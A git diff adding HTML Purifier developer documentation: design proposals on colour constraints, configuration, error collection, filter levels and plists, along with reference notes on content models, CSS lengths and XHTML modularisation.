lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Proposal to allow for color constraints in HTML Purifier." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>Proposal: Colors - HTML Purifier</title> + +</head><body> + +<h1 class="subtitled">Colors</h1> +<div class="subtitle">Hammering some sense into those color-blind newbies</div> + +<div id="filing">Filed under Proposals</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>Your website probably has a color-scheme. +<span style="color:#090; background:#FFF;">Green on white</span>, +<span style="color:#A0F; background:#FF0;">purple on yellow</span>, +whatever. When you give users the ability to style their content, you may +want them to keep in line with your styling. If you're website is all +about light colors, you don't want a user to come in and vandalize your +page with a deep maroon.</p> + +<p>This is an extremely silly feature proposal, but I'm writing it down anyway.</p> + +<p>What if the user could constrain the colors specified in inline styles? You +are only allowed to use these shades of dark green for text and these shades +of light yellow for the background. At the very least, you could ensure +that we did not have pale yellow on white text.</p> + +<h2>Implementation issues</h2> + +<ol> +<li>Requires the color attribute definition to know, currently, what the text +and background colors are. This becomes difficult when classes are thrown +into the mix.</li> +<li>The user still has to define the permissible colors, how does one do +something like that?</li> +</ol> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/proposal-config.txt b/lib/htmlpurifier/docs/proposal-config.txt new file mode 100644 index 000000000..4e031c586 --- /dev/null +++ b/lib/htmlpurifier/docs/proposal-config.txt @@ -0,0 +1,23 @@ + +Configuration + +Configuration is documented on a per-use case: if a class uses a certain +value from the configuration object, it has to define its name and what the +value is used for. This means decentralized configuration declarations that +are nevertheless error checking and a centralized configuration object. + +Directives are divided into namespaces, indicating the major portion of +functionality they cover (although there may be overlaps). Please consult +the documentation in ConfigDef for more information on these namespaces. + +Since configuration is dependant on context, internal classes require a +configuration object to be passed as a parameter. (They also require a +Context object). A majority of classes do not need the config object, +but for those who do, it is a lifesaver. + +Definition objects are complex datatypes influenced by their respective +directive namespaces (HTMLDefinition with HTML and CSSDefinition with CSS). +If any of these directives is updated, HTML Purifier forces the definition +to be regenerated. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/proposal-css-extraction.txt b/lib/htmlpurifier/docs/proposal-css-extraction.txt new file mode 100644 index 000000000..9933c96b8 --- /dev/null +++ b/lib/htmlpurifier/docs/proposal-css-extraction.txt @@ -0,0 +1,34 @@ + +Extracting inline CSS from HTML Purifier + voodoofied: Assigning semantics to elements + +Sander Tekelenburg brought to my attention the poor programming style of +inline CSS in HTML documents. In an ideal world, we wouldn't be using inline +CSS at all: everything would be assigned using semantic class attributes +from an external stylesheet. + +With ExtractStyleBlocks and CSSTidy, this is now possible (when allowed, users +can specify a style element which gets extracted from the user-submitted HTML, which +the application can place in the head of the HTML document). But there still +is the issue of inline CSS that refuses to go away. + +The basic idea behind this feature is assign every element a unique identifier, +and then move all of the CSS data to a style-sheet. This HTML: + +<div style="text-align:center">Big <span style="color:red;">things</span>!</div> + +into + +<div id="hp-12345">Big <span id="hp-12346">things</span>!</div> + +and a stylesheet that is: + +#hp-12345 {text-align:center;} +#hp-12346 {color:red;} + +Beyond that, HTML Purifier can magically merge common CSS values together, +and a whole manner of other heuristic things. HTML Purifier should also +make it easy for an admin to re-style the HTML semantically. Speed is not +an issue. Also, better WYSIWYG editors are needed. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/proposal-errors.txt b/lib/htmlpurifier/docs/proposal-errors.txt new file mode 100644 index 000000000..87cb2ac19 --- /dev/null +++ b/lib/htmlpurifier/docs/proposal-errors.txt @@ -0,0 +1,211 @@ +Considerations for ErrorCollection + +Presently, HTML Purifier takes a code-execution centric approach to handling +errors. Errors are organized and grouped according to which segment of the +code triggers them, not necessarily the portion of the input document that +triggered the error. This means that errors are pseudo-sorted by category, +rather than location in the document. + +One easy way to "fix" this problem would be to re-sort according to line number. +However, the "category" style information we derive from naively following +program execution is still useful. After all, each of the strategies which +can report errors still process the document mostly linearly. Furthermore, +not only do they process linearly, but the way they pass off operations to +sub-systems mirrors that of the document. For example, AttrValidator will +linearly proceed through elements, and on each element will use AttrDef to +validate those contents. From there, the attribute might have more +sub-components, which have execution passed off accordingly. + +In fact, each strategy handles a very specific class of "error." + +RemoveForeignElements - element tokens +MakeWellFormed - element token ordering +FixNesting - element token ordering +ValidateAttributes - attributes of elements + +The crucial point is that while we care about the hierarchy governing these +different errors, we *don't* care about any other information about what actually +happens to the elements. This brings up another point: if HTML Purifier fixes +something, this is not really a notice/warning/error; it's really a suggestion +of a way to fix the aforementioned defects. + +In short, the refactoring to take this into account kinda sucks. + +Errors should not be recorded in order that they are reported. Instead, they +should be bound to the line (and preferably element) in which they were found. +This means we need some way to uniquely identify every element in the document, +which doesn't presently exist. An easy way of adding this would be to track +line columns. An important ramification of this is that we *must* use the +DirectLex implementation. + + 1. Implement column numbers for DirectLex [DONE!] + 2. Disable error collection when not using DirectLex [DONE!] + +Next, we need to re-orient all of the error declarations to place CurrentToken +at utmost important. Since this is passed via Context, it's not always clear +if that's available. ErrorCollector should complain HARD if it isn't available. +There are some locations when we don't have a token available. These include: + + * Lexing - this can actually have a row and column, but NOT correspond to + a token + * End of document errors - bump this to the end + +Actually, we *don't* have to complain if CurrentToken isn't available; we just +set it as a document-wide error. And actually, nothing needs to be done here. + +Something interesting to consider is whether or not we care about the locations +of attributes and CSS properties, i.e. the sub-objects that compose these things. +In terms of consistency, at the very least attributes should have column/line +numbers attached to them. However, this may be overkill, as attributes are +uniquely identifiable. You could go even further, with CSS, but they are also +uniquely identifiable. + +Bottom-line is, however, this information must be available, in form of the +CurrentAttribute and CurrentCssProperty (theoretical) context variables, and +it must be used to organize the errors that the sub-processes may throw. +There is also a hierarchy of sorts that may make merging this into one context +variable more sense, if it hadn't been for HTML's reasonably rigid structure. +A CSS property will never contain an HTML attribute. So we won't ever get +recursive relations, and having multiple depths won't ever make sense. Leave +this be. + +We already have this information, and consequently, using start and end is +*unnecessary*, so long as the context variables are set appropriately. We don't +care if an error was thrown by an attribute transform or an attribute definition; +to the end user these are the same (for a developer, they are different, but +they're better off with a stack trace (which we should add support for) in such +cases). + + 3. Remove start()/end() code. Don't get rid of recursion, though [DONE] + 4. Setup ErrorCollector to use context information to setup hierarchies. + This may require a different internal format. Use objects if it gets + complex. [DONE] + + ASIDE + More on this topic: since we are now binding errors to lines + and columns, a particular error can have three relationships to that + specific location: + + 1. The token at that location directly + RemoveForeignElements + AttrValidator (transforms) + MakeWellFormed + 2. A "component" of that token (i.e. attribute) + AttrValidator (removals) + 3. A modification to that node (i.e. contents from start to end + token) as a whole + FixNesting + + This needs to be marked accordingly. In the presentation, it might + make sense keep (3) separate, have (2) a sublist of (1). (1) can + be a closing tag, in which case (3) makes no sense at all, OR it + should be related with its opening tag (this may not necessarily + be possible before MakeWellFormed is run). + + So, the line and column counts as our identifier, so: + + $errors[$line][$col] = ... + + Then, we need to identify case 1, 2 or 3. They are identified as + such: + + 1. Need some sort of semaphore in RemoveForeignElements, etc. + 2. If CurrentAttr/CurrentCssProperty is non-null + 3. Default (FixNesting, MakeWellFormed) + + One consideration about (1) is that it usually is actually a + (3) modification, but we have no way of knowing about that because + of various optimizations. However, they can probably be treated + the same. The other difficulty is that (3) is never a line and + column; rather, it is a range (i.e. a duple) and telling the user + the very start of the range may confuse them. For example, + + <b>Foo<div>bar</div></b> + ^ ^ + + The node being operated on is <b>, so the error would be assigned + to the first caret, with a "node reorganized" error. Then, the + ChildDef would have submitted its own suggestions and errors with + regard to what's going in the internals. So I suppose this is + ok. :-) + + Now, the structure of the earlier mentioned ... would be something + like this: + + object { + type = (token|attr|property), + value, // appropriate for type + errors => array(), + sub-errors = [recursive], + } + + This helps us keep things agnostic. It is also sufficiently complex + enough to warrant an object. + +So, more wanking about the object format is in order. The way HTML Purifier is +currently setup, the only possible hierarchy is: + + token -> attr -> css property + +These relations do not exist all of the time; a comment or end token would not +ever have any attributes, and non-style attributes would never have CSS properties +associated with them. + +I believe that it is worth supporting multiple paths. At some point, we might +have a hierarchy like: + + * -> syntax + -> token -> attr -> css property + -> url + -> css stylesheet <style> + +et cetera. Now, one of the practical implications of this is that every "node" +on our tree is well-defined, so in theory it should be possible to either 1. +create a separate class for each error struct, or 2. embed this information +directly into HTML Purifier's token stream. Embedding the information in the +token stream is not a terribly good idea, since tokens can be removed, etc. +So that leaves us with 1... and if we use a generic interface we can cut down +on a lot of code we might need. So let's leave it like this. + +~~~~ + +Then we setup suggestions. + + 5. Setup a separate error class which tells the user any modifications + HTML Purifier made. + +Some information about this: + +Our current paradigm is to tell the user what HTML Purifier did to the HTML. +This is the most natural mode of operation, since that's what HTML Purifier +is all about; it was not meant to be a validator. + +However, most other people have experience dealing with a validator. In cases +where HTML Purifier unambiguously does the right thing, simply giving the user +the correct version isn't a bad idea, but problems arise when: + +- The user has such bad HTML we do something odd, when we should have just + flagged the HTML as an error. Such examples are when we do things like + remove text from directly inside a <table> tag. It was probably meant to + be in a <td> tag or be outside the table, but we're not smart enough to + realize this so we just remove it. In such a case, we should tell the user + that there was foreign data in the table, but then we shouldn't "demand" + the user remove the data; it's more of a "here's a possible way of + rectifying the problem" + +- Giving line context for input is hard enough, but feasible; giving output + line context will be extremely difficult due to shifting lines; we'd probably + have to track what the tokens are and then find the appropriate out context + and it's not guaranteed to work etc etc etc. + +```````````` + +Don't forget to spruce up output. + + 6. Output needs to automatically give line and column numbers, basically + "at line" on steroids. Look at W3C's output; it's ok. [PARTIALLY DONE] + + - We need a standard CSS to apply (check demo.css for some starting + styling; some buttons would also be hip) + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/proposal-filter-levels.txt b/lib/htmlpurifier/docs/proposal-filter-levels.txt new file mode 100644 index 000000000..b78b898b4 --- /dev/null +++ b/lib/htmlpurifier/docs/proposal-filter-levels.txt @@ -0,0 +1,137 @@ + +Filter Levels + When one size *does not* fit all + +It makes little sense to constrain users to one set of HTML elements and +attributes and tell them that they are not allowed to mold this in +any fashion. Many users demand to be able to custom-select which elements +and attributes they want. This is fine: because HTML Purifier keeps close +track of what elements are safe to use, there is no way for them to +accidently allow an XSS-able tag. + +However, combing through the HTML spec to make your own whitelist can +be a daunting task. HTML Purifier ought to offer pre-canned filter levels +that amateur users can select based on what they think is their use-case. + +Here are some fuzzy levels you could set: + +1. Comments - Wordpress recommends a, abbr, acronym, b, blockquote, cite, + code, em, i, strike, strong; however, you could get away with only a, em and + p; also having blockquote and pre tags would be helpful. +2. BBCode - Emulate the usual tagset for forums: b, i, img, a, blockquote, + pre, div, span and h[2-6] (the last three are for specially formatted + posts, div and span require associated classes or inline styling enabled + to be useful) +3. Pages - As permissive as possible without allowing XSS. No protection + against bad design sense, unfortunantely. Suitable for wiki and page + environments. (probably what we have now) +4. Lint - Accept everything in the spec, a Tidy wannabe. (This probably won't + get implemented as it would require routines for things like <object> + and friends to be implemented, which is a lot of work for not a lot of + benefit) + +One final note: when you start axing tags that are more commonly used, you +run the risk of accidentally destroying user data, especially if the data +is incoming from a WYSIWYG editor that hasn't been synced accordingly. This may +make forbidden element to text transformations desirable (for example, images). + + + +== Element Risk Analysis == + +Although none of the currently supported elements presents a security +threat per-say, some can cause problems for page layouts or be +extremely complicated. + +Legend: + [danger level] - regular tags / uncommon tags ~ deprecated tags + [danger level]* - rare tags + +1 - blockquote, code, em, i, p, tt / strong, sub, sup +1* - abbr, acronym, bdo, cite, dfn, kbd, q, samp +2 - b, br, del, div, pre, span / ins, s, strike ~ u +3 - h2, h3, h4, h5, h6 ~ center +4 - h1, big ~ font +5 - a +7 - area, map + +These are special use tags, they should be enabled on a blanket basis. + +Lists - dd, dl, dt, li, ol, ul ~ menu, dir +Tables - caption, table, td, th, tr / col, colgroup, tbody, tfoot, thead + +Forms - fieldset, form, input, lable, legend, optgroup, option, select, textarea +XSS - noscript, object, script ~ applet +Meta - base, basefont, body, head, html, link, meta, style, title +Frames - frame, frameset, iframe + +And tag specific notes: + +a - general problems involving linkspam +b - too much bold is bad, typographically speaking bold is discouraged +br - often misused +center - CSS, usually no legit use +del - only useful in editing context +div - little meaning in certain contexts i.e. blog comment +h1 - usually no legit use, as header is already set by application +h* - not needed in blog comments +hr - usually not necessary in blog comments +img - could be extremely undesirable if linking to external pics (CSRF, goatse) +pre - could use formatting, only useful in code contexts +q - very little support +s - transform into span with styling or del? +small - technically presentational +span - depends on attribute allowances +sub, sup - specialized +u - little legit use, prefer class with text-decoration + +Based on the riskiness of the items, we may want to offer %HTML.DisableImages +attribute and put URI filtering higher up on the priority list. + + +== Attribute Risk Analysis == + +We actually have a suprisingly small assortment of allowed attributes (the +rest are deprecated in strict, and thus we opted not to allow them, even +though our output is XHTML Transitional by default.) + +Required URI - img.alt, img.src, a.href +Medium risk - *.class, *.dir +High risk - img.height, img.width, *.id, *.style + +Table - colgroup/col.span, td/th.rowspan, td/th.colspan +Uncommon - *.title, *.lang, *.xml:lang +Rare - td/th.abbr, table.summary, {table}.charoff +Rare URI - del.cite, ins.cite, blockquote.cite, q.cite, img.longdesc +Presentational - {table}.align, {table}.valign, table.frame, table.rules, + table.border +Partially presentational - table.cellpadding, table.cellspacing, + table.width, col.width, colgroup.width + + +== CSS Risk Analysis == + +Currently, there is no support for fine-grained "allowed CSS" specification, +mainly because I'm lazy, partially because no one has asked for it. However, +this will be added eventually. + +There are certain CSS elements that are extremely useful inline, but then +as you get to more presentation oriented styling it may not always be +appropriate to inline them. + +Useful - clear, float, border-collapse, caption-side + +These CSS properties can break layouts if used improperly. We have excluded +any CSS properties that are not currently implemented (such as position). + +Dangerous, can go outside container - float +Easy to abuse - font-size, font-family (font), width +Colored - background-color (background), border-color (border), color + (see proposal-colors.html) +Dramatic - border, list-style-position (list-style), margin, padding, + text-align, text-indent, text-transform, vertical-align, line-height + +Dramatic elements substantially change the look of text in ways that should +probably have been reserved to other areas. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/proposal-language.txt b/lib/htmlpurifier/docs/proposal-language.txt new file mode 100644 index 000000000..149701cd3 --- /dev/null +++ b/lib/htmlpurifier/docs/proposal-language.txt @@ -0,0 +1,64 @@ +We are going to model our I18N/L10N off of MediaWiki's system. Their's is +obviously quite complicated, so we're going to simplify it a bit for our needs. + +== Caching == + +MediaWiki has lots of caching mechanisms built in, which make the code somewhat +more difficult to understand. Before doing any loading, MediaWiki will check +the following places to see if we can be lazy: + +1. $mLocalisationCache[$code] - just a variable where it may have been stashed +2. serialized/$code.ser - compiled serialized language file +3. Memcached version of file (with expiration checking) + +Expiration checking consists of by ensuring all dependencies have filemtime +that match the ones bundled with the cached copy. Similar checking could be +implemented for serialized versions, as it seems that they are not updated +until manually recompiled. + +== Behavior == + +Things that are localizable: + +- Weekdays (and abbrev) +- Months (and abbrev) +- Bookstores +- Skin names +- Date preferences / Custom date format +- Default date format +- Default user option overrides +-+ Language names +- Timezones +-+ Character encoding conversion via iconv +- UpperLowerCase first (needs casemaps for some) +- UpperLowerCase +- Uppercase words +- Uppercase word breaks +- Case folding +- Strip punctuation for MySQL search +- Get first character +-+ Alternate encoding +-+ Recoding for edit (and then recode input) +-+ RTL +-+ Direction mark character depending on RTL +-? Arrow depending on RTL +- Languages where italics cannot be used +-+ Number formatting (commafy, transform digits, transform separators) +- Truncate (multibyte) +- Grammar conversions for inflected languages +- Plural transformations +- Formatting expiry times +- Segmenting for diffs (Chinese) +- Convert to variants of language +- Language specific user preference options +- Link trails [[foo]]bar +-+ Language code (RFC 3066) + +Neat functionality: + +- I18N sprintfDate +- Roman numeral formatting + +Items marked with a + likely need to be addressed by HTML Purifier + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/proposal-new-directives.txt b/lib/htmlpurifier/docs/proposal-new-directives.txt new file mode 100644 index 000000000..f54ee2d8d --- /dev/null +++ b/lib/htmlpurifier/docs/proposal-new-directives.txt @@ -0,0 +1,44 @@ + +Configuration Ideas + +Here are some theoretical configuration ideas that we could implement some +time. Note the naming convention: %Namespace.Directive. If you want one +implemented, give us a ring, and we'll move it up the priority chain. + +%Attr.RewriteFragments - if there's %Attr.IDPrefix we may want to transparently + rewrite the URLs we parse too. However, we can only do it when it's a pure + anchor link, so it's not foolproof + +%Attr.ClassBlacklist, +%Attr.ClassWhitelist, +%Attr.ClassPolicy - determines what classes are allowed. When + %Attr.ClassPolicy is set to Blacklist, only allow those not in + %Attr.ClassBlacklist. When it's Whitelist, only allow those in + %Attr.ClassWhitelist. + +%Attr.MaxWidth, +%Attr.MaxHeight - caps for width and height related checks. + (the hack in Pixels for an image crashing attack could be replaced by this) + +%URI.AddRelNofollow - will add rel="nofollow" to all links, preventing the + spread of ill-gotten pagerank + +%URI.HostBlacklistRegex - regexes that if matching the host are disallowed +%URI.HostWhitelist - domain names that are excluded from the host blacklist +%URI.HostPolicy - determines whether or not its reject all and then whitelist + or allow all in then do specific blacklists with whitelist intervening. + 'DenyAll' or 'AllowAll' (default) + +%URI.DisableIPHosts - URIs that have IP addresses for hosts are disallowed. + Be sure to also grab unusual encodings (dword, hex and octal), which may + be currently be caught by regular DNS +%URI.DisableIDN - Disallow raw internationalized domain names. Punycode + will still be permitted. + +%URI.ConvertUnusualIPHosts - transform dword/hex/octal IP addresses to the + regular form +%URI.ConvertAbsoluteDNS - Remove extra dots after host names that trigger + absolute DNS. While this is actually the preferred method according to + the RFC, most people opt to use a relative domain name relative to . (root). + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/proposal-plists.txt b/lib/htmlpurifier/docs/proposal-plists.txt new file mode 100644 index 000000000..eef8ade61 --- /dev/null +++ b/lib/htmlpurifier/docs/proposal-plists.txt @@ -0,0 +1,218 @@ +THE UNIVERSAL DESIGN PATTERN: PROPERTIES +Steve Yegge + +Implementation: + get(name) + put(name, value) + has(name) + remove(name) + iteration, with filtering [this will be our namespaces] + parent + +Representations: + - Keys are strings + - It's nice to not need to quote keys (if we formulate our own language, + consider this) + - Property not present representation (key missing) + - Frequent removal/re-add may have null help. If null is valid, use + another value. (PHP semantics are weird here) + +Data structures: + - LinkedHashMap is wonderful (O(1) access and maintains order) + - Using a special property that points to the parent is usual + - Multiple inheritance possible, need rules for which to lookup first + - Iterative inheritance is best + - Consider performance! + +Deletion + - Tricky problem with inheritance + - Distinguish between "not found" and "look in my parent for the property" + [Maybe HTML Purifier won't allow deletion] + +Read/write asymmetry (it's correct!) + +Read-only plists + - Allow ability to freeze [this is what we have already] + - Don't overuse it + +Performance: + - Intern strings (PHP does this already) + - Don't be case-insensitive + - If all properties in a plist are known a-priori, you can use a "perfect" + hash function. Often overkill. + - Copy-on-read caching "plundering" reduces lookup, but uses memory and can + grow stale. Use as last resort. + - Refactoring to fields. Watch for API compatibility, system complexity, + and lack of flexibility. + - Refrigerator: external data-structure to hold plists + +Transient properties: + [Don't need to worry about this] + - Use a separate plist for transient properties + - Non-numeric override; numeric should ADD + - Deletion: removeTransientProperty() and transientlyRemoveProperty() + +Persistence: + - XML/JSON are good + - Text-based is good for readability, maintainability and bootstrapping + - Compressed binary format for network transport [not necessary] + - RDBMS or XML database + +Querying: [not relevant] + - XML database is nice for XPath/XQuery + - jQuery for JSON + - Just load it all into a program + +Backfills/Data integrity: + - Use usual methods + - Lazy backfill is a nice hack + +Type systems: + - Flags: ReadOnly, Permanent, DontEnum + - Typed properties isn't that useful [It's also Not-PHP] + - Seperate meta-list of directive properties IS useful + - Duck typing is useful for systems designed fully around properties pattern + +Trade-off: + + Flexibility + + Extensibility + + Unit-testing/prototype-speed + - Performance + - Data integrity + - Navagability/Query-ability + - Reversability (hard to go back) + +HTML Purifier + +We are not happy with our current system of defining configuration directives, +because it has become clear that things will get a lot nicer if we allow +multiple namespaces, and there are some features that naturally lend themselves +to inheritance, which we do not really support well. + +One of the considered implementation changes would be to go from a structure +like: + +array( + 'Namespace' => array( + 'Directive' => 'val1', + 'Directive2' => 'val2', + ) +) + +to: + +array( + 'Namespace.Directive' => 'val1', + 'Namespace.Directive2' => 'val2', +) + +The below implementation takes more memory, however, and it makes it a bit +complicated to grab all values from a namespace. + +The alternate implementation choice is to allow nested plists. This keeps +iteration easy, but is problematic for inheritance (it would be difficult +to distinguish a plist from an array) and retrieval (when specifying multiple +namespaces we would need some multiple de-referencing). + +---- + +We can bite the performance hit, and just do iteration with filter +(the strncmp call should be relatively cheap). Then, users should be able +to optimize doing something like: + +$config = HTMLPurifier_Config::createDefault(); +if (!file_exists('config.php')) { + // set up $config + $config->save('config.php'); +} else { + $config->load('config.php'); +} + +Or maybe memcache, or something. This means that "// set up $config" must +not have any dynamic parts, or the user has to invalidate the cache when +they do update it. We have to think about this a little more carefully; the +file call might be more expensive. + +---- + +This might get expensive, however, when we actually care about iterating +over the configuration and want the actual values. So what about nesting the +lists? + +"ns.sub.directive" => values['ns']['sub']['directive'] + +We can distinguish between plists and arrays by using ArrayObjects for the +plists, and regular arrays for the arrays? Alternatively, use ArrayObjects +for the arrays, and regular arrays for the plists. + +---- + +Implementation demands, and what has caused them: + +1. DefinitionCache, the HTML, CSS and URI namespaces have caches attached to them + Results: + - getBatchSerial() + - getBatch() : in general, the ability to traverse just a namespace + +2. AutoFormat/Filter, this is a plugin architecture, directives not hard-coded + - getBatch() + +3. Configuration form + - Namespaces used to organize directives + +Other than that, we have a pure plist. PERHAPS we should maintain separate things +for these different demands. + +Issue 2: Directives for configuring the plugins are regular plists, but +when enabling them, while it's "plist-ish", what you're really doing is adding +them to an array of "autoformatters"/"filters" to enable. We can setup +magic BC as well as in the new interface, but there should also be an +add('AutoFormat', 'AutoParagraph'); which does the right thing. + +One thing to consider is whether or not inheritance rules will apply to these. +I'd say yes. That means that they're still plisty, in fact, the underlying +implementation will probably be a plist. However, they will get their OWN +plists, and will NOT support nesting. + +Issue 1: Our current implementation is generally not efficient; md5(serialize($foo)) +is pretty expensive. So, I don't think there will be any problems if it +gets "less" efficient, as long as we give users a properly fast alternative; +DefinitionRev gives us a way to do this, by simply telling the user they must +update it whenever they update Configuration directives as well. (There are +obvious BC concerns here). + +In such a case, we simply iterate over our plist (performing full retrievals +for each value), grab the entries we care about, and then serialize and hash. +It's going to be slow either way, due to the ability of plists to inherit. +If we ksort(), we don't have to traverse the entire array, however, the +cost of a ksort() call may not be worth it. + +At this point, last time, I started worrying about the performance implications +of allowing inheritance, and wondering whether or not I wanted to squash +the plist. At first blush, our code might be under the assumption that +accessing properties is cheap; but actually we prefer to copy out the value +into a member variable if it's going to be used many times. With this is mind +I don't think CPU consumption from a few nested function calls is going to +be a problem. We *are* going to enforce a function only interface. + +The next issue at hand is how we're going to manage the "special" plists, +which should still be able to be inherited. Basically, it means that multiple +plists would be attached to the configuration object, which is not the +best for memory performance. The alternative is to keep them all in one +big plist, and then eat the one-time cost of traversing the entire plist +to grab the appropriate values. + +I think at this point we can write the generic interface, and then set up separate +plists if that ends up being necessary for performance (it probably won't.) Now +lets code our generic plist implementation. + +---- + +Iterating over the plist presents some problems. The way we've chosen to solve +this is to squash all of the parents. + +---- + +But I don't need iteration. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/ref-content-models.txt b/lib/htmlpurifier/docs/ref-content-models.txt new file mode 100644 index 000000000..19f84d526 --- /dev/null +++ b/lib/htmlpurifier/docs/ref-content-models.txt @@ -0,0 +1,50 @@ + +Handling Content Model Changes + + +1. Context + +The distinction between Transitional and Strict document types is somewhat +of an anomaly in the lineage of XHTML document types (following 1.0, no +doctypes do not have flavors: instead, modularization is used to let +document authors vary their elements). This transition is usually quite +straight-forward, as W3C usually deprecates attributes or elements, which +are quite easily handled using tag and attribute transforms. + +However, for two elements, <blockquote>, <body> and <address>, W3C elected +to also change the content model. <blockquote> and <body> originally +accepted both inline and block elements, but in the strict doctype they +only allow block elements. With <address>, the situation is inverted: +<p> tags were now forbidden from appearing within this tag. + + +2. Current situation + +Currently, HTML Purifier treats <blockquote> specially during Tidy mode +using a custom ChildDef class StrictBlockquote. StrictBlockquote +operates similarly to Required, except that when it encounters an inline +element, it will wrap it in a block tag (as specified by +%HTML.BlockWrapper, the default is <p>). The naming suggests it can +only be used for <blockquote>s, although it may be possible to +genericize it to work on other cases of this nature (this would be of +little practical application, as no other element in XHTML 1.1 or earlier +has a block-only content model). + +Tidy currently contains no custom, lenient implementation for <address>. +If one were to be written, it would likely operate on the principle that, +when a <p> tag were to be encountered, it would be replaced with a +leading and trailing <br /> tag (the contents of <p>, being inline, are +not an issue). There is no prior work with this sort of operation. + + +3. Outside applicability + +There are a number of other elements that contain restrictive content +models, such as <ul> or <span> (the latter is restrictive in that it +does not allow block elements). In the former case, an errant node +is eliminated completely, in the latter case, the text of the node +would is preserved (as the parent node does allow PCDATA). Custom +content model implementations probably are not the best way of handling +these cases, instead, node bubbling should be implemented instead. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/ref-css-length.txt b/lib/htmlpurifier/docs/ref-css-length.txt new file mode 100644 index 000000000..aa40559e3 --- /dev/null +++ b/lib/htmlpurifier/docs/ref-css-length.txt @@ -0,0 +1,30 @@ + +CSS Length Reference + To bound, or not to bound, that is the question + +It's quite a reasonable request, really, and it's already been implemented +for HTML. That is, length bounding. It makes little sense to let users +define text blocks that have a font-size of 63,360 inches (that's a mile, +by the way) or a width of forty-fold the parent container. + +But it's a little more complicated then that. There are multiple units +one can use, and we have to a little unit conversion to get things working. +Here's what we have: + +Absolute: + 1 in ~= 2.54 cm + 1 cm = 10 mm + 1 pt = 1/72 in + 1 pc = 12 pt + +Relative: + 1 em ~= 10.0667 px + 1 ex ~= 0.5 em, though Mozilla Firefox says 1 ex = 6px + 1 px ~= 1 pt + +Watch out: font-sizes can also be nested to get successively larger +(although I do not relish having to keep track of context font-sizes, +this may be necessary, especially for some of the more advanced features +for preventing things like white on white). + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/docs/ref-devnetwork.html b/lib/htmlpurifier/docs/ref-devnetwork.html new file mode 100644 index 000000000..2e9d142e5 --- /dev/null +++ b/lib/htmlpurifier/docs/ref-devnetwork.html @@ -0,0 +1,47 @@ +<?xml version="1.0" encoding="UTF-8"?> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" + "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> +<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> +<meta name="description" content="Credits and links to DevNetwork forum topics on HTML Purifier." /> +<link rel="stylesheet" type="text/css" href="./style.css" /> + +<title>DevNetwork Credits - HTML Purifier</title> + +</head> +<body> + +<h1>DevNetwork Credits</h1> + +<div id="filing">Filed under Reference</div> +<div id="index">Return to the <a href="index.html">index</a>.</div> +<div id="home"><a href="http://htmlpurifier.org/">HTML Purifier</a> End-User Documentation</div> + +<p>Many thanks to the DevNetwork community for answering questions, +theorizing about design, and offering encouragement during +the development of this library in these forum threads:</p> + +<ul> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=52905">HTMLPurifier PHP Library hompeage</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53056">How much of CSS to implement?</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53083">Parsing URL only according to URI : Security Risk?</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53096">Gimme a name : URI and friends</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53415">How to document configuration directives</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53479">IPv6</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53539">http and ftp versus news and mailto</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53579">HTMLPurifier - Take your best shot</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53664">Need help optimizing a block of code</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=53861">Non-SGML characters</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=54283">Wordpress makes me cry</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=54478">Parameter Object vs. Parameter Array vs. Parameter Functions</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=54521">Convert encoding where output cannot represent characters</a></li> + <li><a href="http://forums.devnetwork.net/viewtopic.php?t=56411">Reporting errors in a document without line numbers</a></li> +</ul> + +<p>...as well as any I may have forgotten.</p> + +</body> +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/docs/ref-html-modularization.txt b/lib/htmlpurifier/docs/ref-html-modularization.txt new file mode 100644 index 000000000..d26d30ada --- /dev/null +++ b/lib/htmlpurifier/docs/ref-html-modularization.txt @@ -0,0 +1,166 @@ + +The Modularization of HTMLDefinition in HTML Purifier + +WARNING: This document was drafted before the implementation of this + system, and some implementation details may have evolved over time. + +HTML Purifier uses the modularization of XHTML +<http://www.w3.org/TR/xhtml-modularization/> to organize the internals +of HTMLDefinition into a more manageable and extensible fashion. Rather +than have one super-object, HTMLDefinition is split into HTMLModules, +each of which are responsible for defining elements, their attributes, +and other properties (for a more indepth coverage, see +/library/HTMLPurifier/HTMLModule.php's docblock comments). These modules +are managed by HTMLModuleManager. + +Modules that we don't support but could support are: + + * 5.6. Table Modules + o 5.6.1. Basic Tables Module [?] + * 5.8. Client-side Image Map Module [?] + * 5.9. Server-side Image Map Module [?] + * 5.12. Target Module [?] + * 5.21. Name Identification Module [deprecated] + +These modules would be implemented as "unsafe": + + * 5.2. Core Modules + o 